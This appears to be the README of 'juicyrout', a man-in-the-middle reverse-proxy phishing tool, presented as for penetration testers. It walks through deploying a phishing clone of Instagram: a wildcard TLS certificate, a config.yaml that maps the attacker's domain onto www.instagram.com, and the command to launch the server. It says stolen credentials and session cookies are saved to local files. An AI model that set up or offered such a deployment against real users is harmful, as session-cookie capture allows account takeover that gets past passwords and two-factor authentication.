juicyrout is a man-in-the-middle attack reverse proxy designed for penetration testers to phish login credentials along with session cookies.
It was developed after experiencing the limitations of evilginx2. The main focus is on the following things:
We use the following technical features to achieve this goal:
Let's imagine that you acquired a new DNS name, for example, host.juicyrout
and you want to run a phishing instagram site
on the domain www.host.juicyrout
on port 8091. There are only three things you need to do:
*.host.juicyrout
e.g. with let's encrypt *.host.juicyrout
juicyrout
with the desired config fileCreate a file config.yaml
:
api_token: your_random_token_here
listen_addr: 0.0.0.0:8091
domain_name: host.juicyrout
external_port: 8091
tls_key: wildcard_host_juicyrout_key.pem
tls_cert: wildcard_host_juicyrout_cert.pem
phishlet_file: phishlets/instagram/config.yaml
domain_mappings:
- proxy: www.host.juicyrout:8091
target: www.instagram.com
api_token
is used for authentication in the admin REST API (see api.go). external_port
is used for incoming network traffic (in case you use Docker or run a reverse proxy in front of the juicyrout server, etc.)phishlet_file
is a config file with phishlet (see instagram phishlet for reference)domain_mappings
describes a list of mappings between domain names with optional ports. For instance,
www.host.juicyrout:8091
with the specified configuration file will be mapped to www.instagram.com
in http request
and back in the response,
but super.subdomain.instagram.com
(target address) will be mapped to super-subdomain-instagram-com.host.juicyrout:8091
(proxy address)
by default.For a complete list of configuration options, see config.go.
Finally, run a phishing server:
juicyrout -c config.yaml
All captured credentials will by default be stored in the creds.jsonl
file, and captured sessions will be stored in the
sessions.jsonl
file.
Enjoy!